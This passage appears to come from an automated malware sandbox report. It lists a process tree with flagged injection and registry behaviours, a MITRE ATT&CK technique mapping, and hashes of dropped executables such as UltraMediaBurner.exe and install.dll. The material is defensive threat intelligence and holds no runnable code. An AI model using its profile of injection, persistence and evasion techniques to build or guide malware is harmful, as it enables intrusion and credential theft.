                                                                        1⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:688
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Checks processor information in registry
                                                                          • Modifies data under HKEY_USERS
                                                                          • Modifies registry class
                                                                          PID:3288
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies Internet Explorer settings
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4796
                                                                      • C:\Windows\system32\browser_broker.exe
                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                        1⤵
                                                                        • Modifies Internet Explorer settings
                                                                        PID:4844
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5060
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies Internet Explorer settings
                                                                        • Modifies registry class
                                                                        PID:684
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:5728
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:4636
                                                                      • \??\c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                        1⤵
                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                        PID:4420
                                                                      • C:\Users\Admin\AppData\Local\Temp\D12C.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\D12C.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:5604
                                                                      • C:\Users\Admin\AppData\Local\Temp\D989.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\D989.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:1244
                                                                      • C:\Users\Admin\AppData\Local\Temp\DFD4.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\DFD4.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:2180
                                                                      • C:\Users\Admin\AppData\Local\Temp\E4C6.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\E4C6.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:6096
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                          2⤵
                                                                            PID:5400
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            2⤵
                                                                              PID:5260
                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                            1⤵
                                                                              PID:4952
                                                                            • C:\Windows\explorer.exe
                                                                              C:\Windows\explorer.exe
                                                                              1⤵
                                                                                PID:1480
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:3496
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  1⤵
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5068
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:5076
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:6128
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:4496
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4248
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:4584
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                        1⤵
                                                                                          PID:5972
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                          1⤵
                                                                                            PID:5356
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                            1⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5880
                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies Internet Explorer settings
                                                                                            PID:2128
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:3736
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                              PID:4996
                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                C:\Windows\system32\WerFault.exe -u -p 4996 -s 2180
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:416
                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                C:\Windows\system32\WerFault.exe -u -p 4996 -s 1276
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5172
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:5188
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:1216
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                              1⤵
                                                                                                PID:3900
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                1⤵
                                                                                                  PID:4944

                                                                                                Network

                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                Persistence

                                                                                                Registry Run Keys / Startup Folder

                                                                                                1
                                                                                                T1060

                                                                                                BITS Jobs

                                                                                                1
                                                                                                T1197

                                                                                                Defense Evasion

                                                                                                Disabling Security Tools

                                                                                                2
                                                                                                T1089

                                                                                                Modify Registry

                                                                                                5
                                                                                                T1112

                                                                                                BITS Jobs

                                                                                                1
                                                                                                T1197

                                                                                                Install Root Certificate

                                                                                                1
                                                                                                T1130

                                                                                                Credential Access

                                                                                                Credentials in Files

                                                                                                4
                                                                                                T1081

                                                                                                Discovery

                                                                                                Software Discovery

                                                                                                1
                                                                                                T1518

                                                                                                Query Registry

                                                                                                4
                                                                                                T1012

                                                                                                System Information Discovery

                                                                                                5
                                                                                                T1082

                                                                                                Security Software Discovery

                                                                                                1
                                                                                                T1063

                                                                                                Peripheral Device Discovery

                                                                                                1
                                                                                                T1120

                                                                                                Remote System Discovery

                                                                                                1
                                                                                                T1018

                                                                                                Collection

                                                                                                Data from Local System

                                                                                                4
                                                                                                T1005

                                                                                                Command and Control

                                                                                                Web Service

                                                                                                1
                                                                                                T1102

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                  MD5

                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                  SHA1

                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                  SHA256

                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                  SHA512

                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                  MD5

                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                  SHA1

                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                  SHA256

                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                  SHA512

                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                • C:\Program Files\Windows NT\QXYWDLUOFA\ultramediaburner.exe
                                                                                                  MD5

                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                  SHA1

                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                  SHA256

                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                  SHA512

                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                • C:\Program Files\Windows NT\QXYWDLUOFA\ultramediaburner.exe
                                                                                                  MD5

                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                  SHA1

                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                  SHA256

                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                  SHA512

                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                • C:\Program Files\install.dat
                                                                                                  MD5

                                                                                                  806c3221a013fec9530762750556c332

                                                                                                  SHA1

                                                                                                  36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                  SHA256

                                                                                                  9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                  SHA512

                                                                                                  56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                • C:\Program Files\install.dat
                                                                                                  MD5

                                                                                                  31e4a5735b20be6a53cbb552663b1cc3

                                                                                                  SHA1

                                                                                                  c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                  SHA256

                                                                                                  b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                  SHA512

                                                                                                  3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                • C:\Program Files\install.dll
                                                                                                  MD5

                                                                                                  fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                  SHA1

                                                                                                  6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                  SHA256

                                                                                                  9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                  SHA512

                                                                                                  0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                • C:\Program Files\install.dll
                                                                                                  MD5

                                                                                                  fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                  SHA1

                                                                                                  6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                  SHA256

                                                                                                  9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                  SHA512

                                                                                                  0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                • C:\Program Files\libEGL.dll
                                                                                                  MD5

                                                                                                  cc0f81a657d6887e246f49151e60123d

                                                                                                  SHA1

                                                                                                  1eb31528501c375817853e09d95b7152858c5b31

                                                                                                  SHA256

                                                                                                  31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                  SHA512

                                                                                                  8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                • C:\Users\Admin\AppData\Local\Temp\05-2c25c-730-8d3bf-5bcd330008e50\Qikanenasae.exe
                                                                                                  MD5

                                                                                                  18e49540637bccc9b3a7ca3d48cae223

                                                                                                  SHA1

                                                                                                  b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                  SHA256

                                                                                                  698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                  SHA512

                                                                                                  a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                • C:\Users\Admin\AppData\Local\Temp\05-2c25c-730-8d3bf-5bcd330008e50\Qikanenasae.exe
                                                                                                  MD5

                                                                                                  18e49540637bccc9b3a7ca3d48cae223

                                                                                                  SHA1

                                                                                                  b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                  SHA256

                                                                                                  698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                  SHA512

                                                                                                  a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                • C:\Users\Admin\AppData\Local\Temp\05-2c25c-730-8d3bf-5bcd330008e50\Qikanenasae.exe.config
                                                                                                  MD5

                                                                                                  98d2687aec923f98c37f7cda8de0eb19

                                                                                                  SHA1

                                                                                                  f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                  SHA256

                                                                                                  8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                  SHA512

                                                                                                  95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                • C:\Users\Admin\AppData\Local\Temp\08-80410-c24-1afb9-4f3dadec17d76\Kenessey.txt
                                                                                                  MD5

                                                                                                  97384261b8bbf966df16e5ad509922db

                                                                                                  SHA1

                                                                                                  2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                  SHA256

                                                                                                  9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                  SHA512

                                                                                                  b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                • C:\Users\Admin\AppData\Local\Temp\08-80410-c24-1afb9-4f3dadec17d76\Xunaehimowae.exe
                                                                                                  MD5

                                                                                                  2e91d25073151415f8c39de2262cbba8

                                                                                                  SHA1

                                                                                                  32544481a34273a1a870822152d201ea9c19b34d

                                                                                                  SHA256

                                                                                                  0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                  SHA512

                                                                                                  306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                • C:\Users\Admin\AppData\Local\Temp\08-80410-c24-1afb9-4f3dadec17d76\Xunaehimowae.exe
                                                                                                  MD5

                                                                                                  2e91d25073151415f8c39de2262cbba8

                                                                                                  SHA1

                                                                                                  32544481a34273a1a870822152d201ea9c19b34d

                                                                                                  SHA256

                                                                                                  0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                  SHA512

                                                                                                  306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                • C:\Users\Admin\AppData\Local\Temp\08-80410-c24-1afb9-4f3dadec17d76\Xunaehimowae.exe.config
                                                                                                  MD5

                                                                                                  98d2687aec923f98c37f7cda8de0eb19

                                                                                                  SHA1

                                                                                                  f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                  SHA256

                                                                                                  8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                  SHA512

                                                                                                  95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                • C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe
                                                                                                  MD5

                                                                                                  5334f7e66679ea48bf276ed8ca1e7095

                                                                                                  SHA1

                                                                                                  bb1c9fe2b9fafc3a23149aad099d6c0936074373

                                                                                                  SHA256

                                                                                                  b6a4065f542364cfb5c02cb2716f44fc3277852dde0ee36c364a6264a8dc4be5

                                                                                                  SHA512

                                                                                                  2edca1e36e20b7811ba736a99dd57db67913e313e96a858f9c210a689389c12540f60618c73cb0cf24c5dd16caf7835e7ccc242f2ec67de101e1e143bc3d8142

                                                                                                • C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe
                                                                                                  MD5

                                                                                                  5334f7e66679ea48bf276ed8ca1e7095

                                                                                                  SHA1

                                                                                                  bb1c9fe2b9fafc3a23149aad099d6c0936074373

                                                                                                  SHA256

                                                                                                  b6a4065f542364cfb5c02cb2716f44fc3277852dde0ee36c364a6264a8dc4be5

                                                                                                  SHA512

                                                                                                  2edca1e36e20b7811ba736a99dd57db67913e313e96a858f9c210a689389c12540f60618c73cb0cf24c5dd16caf7835e7ccc242f2ec67de101e1e143bc3d8142

                                                                                                • C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                                                  MD5

                                                                                                  e20e11703b9d0eaff6435845448b7039

                                                                                                  SHA1

                                                                                                  77b505adb757654d4a022381bacc00a064e0edab

                                                                                                  SHA256

                                                                                                  4c07df1b246484e8cc49fd15756cfc3a7c1c0b14f611589268aafcd9a0950a00

                                                                                                  SHA512

                                                                                                  c7eb0162ca4df797fc27c2625352f377ecbefdfe0de281a476eff2dcbbf069f118dd54790858676a72928b8d09880e9a1cb6ed8f8d66d87119a92868d02bc0cf

                                                                                                • C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                                                  MD5

                                                                                                  e20e11703b9d0eaff6435845448b7039

                                                                                                  SHA1

                                                                                                  77b505adb757654d4a022381bacc00a064e0edab

                                                                                                  SHA256

                                                                                                  4c07df1b246484e8cc49fd15756cfc3a7c1c0b14f611589268aafcd9a0950a00

                                                                                                  SHA512

                                                                                                  c7eb0162ca4df797fc27c2625352f377ecbefdfe0de281a476eff2dcbbf069f118dd54790858676a72928b8d09880e9a1cb6ed8f8d66d87119a92868d02bc0cf

                                                                                                • C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                                                  MD5

                                                                                                  e20e11703b9d0eaff6435845448b7039

                                                                                                  SHA1

                                                                                                  77b505adb757654d4a022381bacc00a064e0edab

                                                                                                  SHA256

                                                                                                  4c07df1b246484e8cc49fd15756cfc3a7c1c0b14f611589268aafcd9a0950a00

                                                                                                  SHA512

                                                                                                  c7eb0162ca4df797fc27c2625352f377ecbefdfe0de281a476eff2dcbbf069f118dd54790858676a72928b8d09880e9a1cb6ed8f8d66d87119a92868d02bc0cf

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                  MD5

                                                                                                  41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                  SHA1

                                                                                                  0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                  SHA256

                                                                                                  97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                  SHA512

                                                                                                  5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                  MD5

                                                                                                  41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                  SHA1

                                                                                                  0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                  SHA256

                                                                                                  97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                  SHA512

                                                                                                  5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                  MD5

                                                                                                  3b1b318df4d314a35dce9e8fd89e5121

                                                                                                  SHA1

                                                                                                  55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                  SHA256

                                                                                                  4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                  SHA512

                                                                                                  f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                  MD5

                                                                                                  3b1b318df4d314a35dce9e8fd89e5121

                                                                                                  SHA1

                                                                                                  55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                  SHA256

                                                                                                  4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                  SHA512

                                                                                                  f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                  MD5

                                                                                                  3bc84c0e8831842f2ae263789217245d

                                                                                                  SHA1

                                                                                                  d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                  SHA256

                                                                                                  757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                  SHA512

                                                                                                  f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                  MD5

                                                                                                  3bc84c0e8831842f2ae263789217245d

                                                                                                  SHA1

                                                                                                  d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                  SHA256

                                                                                                  757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                  SHA512

                                                                                                  f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                  MD5

                                                                                                  25d9f83dc738b4894cf159c6a9754e40

                                                                                                  SHA1

                                                                                                  152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                  SHA256

                                                                                                  8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                  SHA512

                                                                                                  41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                  MD5

                                                                                                  25d9f83dc738b4894cf159c6a9754e40

                                                                                                  SHA1

                                                                                                  152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                  SHA256

                                                                                                  8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                  SHA512

                                                                                                  41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                  MD5

                                                                                                  e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                  SHA1

                                                                                                  1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                  SHA256

                                                                                                  8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                  SHA512

                                                                                                  71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                  MD5

                                                                                                  e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                  SHA1

                                                                                                  1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                  SHA256

                                                                                                  8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                  SHA512

                                                                                                  71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                • C:\Users\Admin\AppData\Local\Temp\hvwqauuu.0jh\instEU.exe
                                                                                                  MD5

                                                                                                  bdb62dc3502ea91f26181fa451bd0878

                                                                                                  SHA1

                                                                                                  bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                  SHA256

                                                                                                  6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                  SHA512

                                                                                                  12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

